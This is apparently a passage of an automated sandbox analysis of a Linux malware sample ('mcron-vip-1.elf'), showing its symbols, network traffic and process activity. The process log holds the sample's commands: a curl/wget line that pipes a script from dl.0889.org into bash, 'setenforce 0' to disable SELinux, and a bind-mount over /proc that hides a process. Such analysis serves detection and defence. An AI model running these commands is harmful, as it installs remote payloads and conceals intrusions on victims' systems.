                            getpidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            mkdirGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            openGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            removeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            setsidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            signalGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strlenGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            systemGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            writeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            GLIBC_2.2.5libc.so.6.symtab0x4002000SECTION<unknown>DEFAULT1
                            GLIBC_2.2.5libc.so.6.symtab0x40021c0SECTION<unknown>DEFAULT2
                            GLIBCXX_3.4libstdc++.so.6.symtab0x40023c0SECTION<unknown>DEFAULT3
                            GLIBC_2.2.5libc.so.6.symtab0x4002600SECTION<unknown>DEFAULT4
                            GLIBC_2.2.5libc.so.6.symtab0x4002980SECTION<unknown>DEFAULT5
                            .symtab0x4005b00SECTION<unknown>DEFAULT6
                            .symtab0x4007ae0SECTION<unknown>DEFAULT7
                            GLIBC_2.2.5libc.so.6.symtab0x4007f00SECTION<unknown>DEFAULT8
                            GLIBCXX_3.4libstdc++.so.6.symtab0x4008400SECTION<unknown>DEFAULT9
                            GLIBC_2.2.5libc.so.6.symtab0x4008880SECTION<unknown>DEFAULT10
                            GLIBC_2.2.5libc.so.6.symtab0x400b280SECTION<unknown>DEFAULT11
                            GLIBC_2.2.5libc.so.6.symtab0x400b400SECTION<unknown>DEFAULT12
                            GLIBC_2.2.5libc.so.6.symtab0x400d100SECTION<unknown>DEFAULT13
                            GLIBCXX_3.4libstdc++.so.6.symtab0x4013d80SECTION<unknown>DEFAULT14
                            GLIBC_2.2.5libc.so.6.symtab0x4013e80SECTION<unknown>DEFAULT15
                            GLIBC_2.2.5libc.so.6.symtab0x4015e00SECTION<unknown>DEFAULT16
                            GLIBC_2.2.5libc.so.6.symtab0x4016400SECTION<unknown>DEFAULT17
                            GLIBC_2.2.5libc.so.6.symtab0x6017d00SECTION<unknown>DEFAULT18
                            GLIBC_2.2.5libc.so.6.symtab0x6017e80SECTION<unknown>DEFAULT19
                            GLIBC_2.2.5libc.so.6.symtab0x6017f80SECTION<unknown>DEFAULT20
                            GLIBC_2.2.5libc.so.6.symtab0x6018000SECTION<unknown>DEFAULT21
                            GLIBCXX_3.4libstdc++.so.6.symtab0x6019c00SECTION<unknown>DEFAULT22
                            GLIBC_2.2.5libc.so.6.symtab0x6019c80SECTION<unknown>DEFAULT23
                            GLIBC_2.2.5libc.so.6.symtab0x601ac00SECTION<unknown>DEFAULT24
                            GLIBC_2.2.5libc.so.6.symtab0x601ae00SECTION<unknown>DEFAULT25
                            GLIBC_2.2.5libc.so.6.symtab0x00SECTION<unknown>DEFAULT26
                            _DYNAMIC.symtab0x6018000OBJECT<unknown>DEFAULT21
                            _GLOBAL_OFFSET_TABLE_.symtab0x6019c80OBJECT<unknown>DEFAULT23
                            _GLOBAL__I_command.symtab0x4012e221FUNC<unknown>DEFAULT13
                            _IO_stdin_used.symtab0x4013e84OBJECT<unknown>DEFAULT15
                            _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            _Z11hideProcessi.symtab0x400ff5252FUNC<unknown>DEFAULT13
                            _Z12becomeDaemonv.symtab0x4010f1397FUNC<unknown>DEFAULT13
                            _Z12handleSignali.symtab0x400e0e146FUNC<unknown>DEFAULT13
                            _Z14executeCommandPKc.symtab0x400df426FUNC<unknown>DEFAULT13
                            _Z21checkAndCreatePidFilei.symtab0x400ea0341FUNC<unknown>DEFAULT13
                            _Z41__static_initialization_and_destruction_0ii.symtab0x4012a264FUNC<unknown>DEFAULT13
                            _ZNSolsEPFRSoS_E@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSolsEi@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4.symtab0x400c000FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZSt4cerr@@GLIBCXX_3.4.symtab0x601ae0272OBJECT<unknown>DEFAULT25
                            _ZSt4cout@@GLIBCXX_3.4.symtab0x601c00272OBJECT<unknown>DEFAULT25
                            _ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_@@GLIBCXX_3.4.symtab0x400cc00FUNC<unknown>DEFAULTSHN_UNDEF
                            _ZStL8__ioinit.symtab0x601d201OBJECT<unknown>DEFAULT25
                            _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __CTOR_END__.symtab0x6017e00OBJECT<unknown>DEFAULT18
                            __CTOR_LIST__GLIBCXX_3.4libstdc++.so.6.symtab0x6017d00OBJECT<unknown>DEFAULT18
                            __DTOR_END__.symtab0x6017f00OBJECT<unknown>HIDDEN19
                            __DTOR_LIST__GLIBCXX_3.4libstdc++.so.6.symtab0x6017e80OBJECT<unknown>DEFAULT19
                            __FRAME_END__.symtab0x4017c80OBJECT<unknown>DEFAULT17
                            __JCR_END__.symtab0x6017f80OBJECT<unknown>DEFAULT20
                            __JCR_LIST__GLIBCXX_3.4libstdc++.so.6.symtab0x6017f80OBJECT<unknown>DEFAULT20
                            __bss_start.symtab0x601ae00NOTYPE<unknown>DEFAULTSHN_ABS
                            __cxa_atexit@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __data_start.symtab0x601ac00NOTYPE<unknown>DEFAULT24
                            __do_global_ctors_aux.symtab0x4013a00FUNC<unknown>DEFAULT13
                            __do_global_dtors_auxCXXABI_1.3libstdc++.so.6.symtab0x400d600FUNC<unknown>DEFAULT13
                            __dso_handle.symtab0x4013f00OBJECT<unknown>HIDDEN15
                            __errno_location@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            __gmon_start__.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __gxx_personality_v0@@CXXABI_1.3.symtab0x400cd00FUNC<unknown>DEFAULTSHN_UNDEF
                            __init_array_end.symtab0x6017cc0NOTYPE<unknown>DEFAULT18
                            __init_array_start.symtab0x6017cc0NOTYPE<unknown>DEFAULT18
                            __libc_csu_fini.symtab0x4013002FUNC<unknown>DEFAULT13
                            __libc_csu_init.symtab0x401310137FUNC<unknown>DEFAULT13
                            __libc_start_main@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            _edata.symtab0x601ae00NOTYPE<unknown>DEFAULTSHN_ABS
                            _end.symtab0x601d280NOTYPE<unknown>DEFAULTSHN_ABS
                            _fini.symtab0x4013d80FUNC<unknown>DEFAULT14
                            _init.symtab0x400b280FUNC<unknown>DEFAULT11
                            _start.symtab0x400d100FUNC<unknown>DEFAULT13
                            call_gmon_startGLIBC_2.2.5libc.so.6.symtab0x400d3c0FUNC<unknown>DEFAULT13
                            chdir@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            close@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            command.symtab0x601ac88OBJECT<unknown>DEFAULT24
                            completed.6364.symtab0x601d101OBJECT<unknown>DEFAULT25
                            crtstuff.cGLIBCXX_3.4libstdc++.so.6.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            data_start.symtab0x601ac00NOTYPE<unknown>DEFAULT24
                            dtor_idx.6366.symtab0x601d188OBJECT<unknown>DEFAULT25
                            dup2@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            exit@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            flock@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            fork@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            frame_dummy.symtab0x400dd00FUNC<unknown>DEFAULT13
                            getpid@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            main.symtab0x40127e36FUNC<unknown>DEFAULT13
                            mcron.cpp.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            mkdir@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            open@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            pidFile.symtab0x601ad08OBJECT<unknown>DEFAULT24
                            remove@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            setsid@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            signal@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sleep@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            sprintf@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strerror@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            strlen@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            system@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                            tmpDir.symtab0x601ad88OBJECT<unknown>DEFAULT24
                            write@@GLIBC_2.2.5.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF


                            • Total Packets: 134
                            • 443 (HTTPS)
                            • 80 (HTTP)
                            • 53 (DNS)
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Nov 2, 2024 10:05:52.885535002 CET | 8.8.8.8 | 192.168.2.14 | 0x69e8 | No error (0) | dl.0889.org | | 20.56.16.3 | A (IP address) | IN (0x0001) | false
                            Nov 2, 2024 10:08:38.237358093 CET | 8.8.8.8 | 192.168.2.14 | 0x8a0d | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false
                            Nov 2, 2024 10:08:38.237358093 CET | 8.8.8.8 | 192.168.2.14 | 0x8a0d | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false
                            Nov 2, 2024 10:10:53.033310890 CET | 8.8.8.8 | 192.168.2.14 | 0x91d8 | No error (0) | dl.0889.org | | 20.56.16.3 | A (IP address) | IN (0x0001) | false
                            • dl.0889.org
                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            0 | 192.168.2.14 | 51120 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:05:52.891045094 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:05:54.051366091 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:05:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            1 | 192.168.2.14 | 51122 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:05:54.251400948 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:05:55.403881073 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:05:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            2 | 192.168.2.14 | 51124 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:06:52.888264894 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:06:54.060653925 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:06:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            3 | 192.168.2.14 | 51126 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:06:54.270478010 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:06:55.460819006 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:06:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            4 | 192.168.2.14 | 51128 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:07:52.894989014 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:07:54.372159004 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Nov 2, 2024 10:07:54.372252941 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            5 | 192.168.2.14 | 51130 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:07:54.523950100 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:07:55.969543934 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Nov 2, 2024 10:07:55.970973015 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:07:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            6 | 192.168.2.14 | 51132 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:08:52.927510977 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:08:54.102874041 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:08:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            7 | 192.168.2.14 | 51134 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:08:54.239042044 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:08:55.400192976 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:08:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            8 | 192.168.2.14 | 51136 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:09:52.974863052 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:09:54.112191916 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:09:53 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            9 | 192.168.2.14 | 51138 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:09:54.289859056 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:09:55.462785959 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:09:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            10 | 192.168.2.14 | 51140 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:10:53.039072990 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:10:54.200016975 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:10:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            11 | 192.168.2.14 | 51142 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:10:54.348264933 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:10:55.524571896 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:10:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            12 | 192.168.2.14 | 51144 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:11:53.054505110 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:11:54.212130070 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:11:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            13 | 192.168.2.14 | 51146 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:11:54.373389959 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:11:55.517473936 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:11:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            14 | 192.168.2.14 | 51148 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:12:53.083514929 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:12:54.241400957 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:12:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            15 | 192.168.2.14 | 51150 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:12:54.392009974 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:12:55.572721958 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:12:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            16 | 192.168.2.14 | 51152 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:13:53.058599949 CET | 95 | OUT | GET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:13:54.233221054 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:13:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            17 | 192.168.2.14 | 51154 | 20.56.16.3 | 80
                            Timestamp | Bytes transferred | Direction | Data
                            Nov 2, 2024 10:13:54.372973919 CET | 158 | OUT | GET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:13:55.526381016 CET | 306 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:13:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            System Behavior

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:/tmp/mcron-vip-1.elf
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "setenforce 0 &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "mount --bind /tmp/.c /proc/5489"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/mount
                            Arguments:mount --bind /tmp/.c /proc/5489
                            File size:55528 bytes
                            MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:05:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
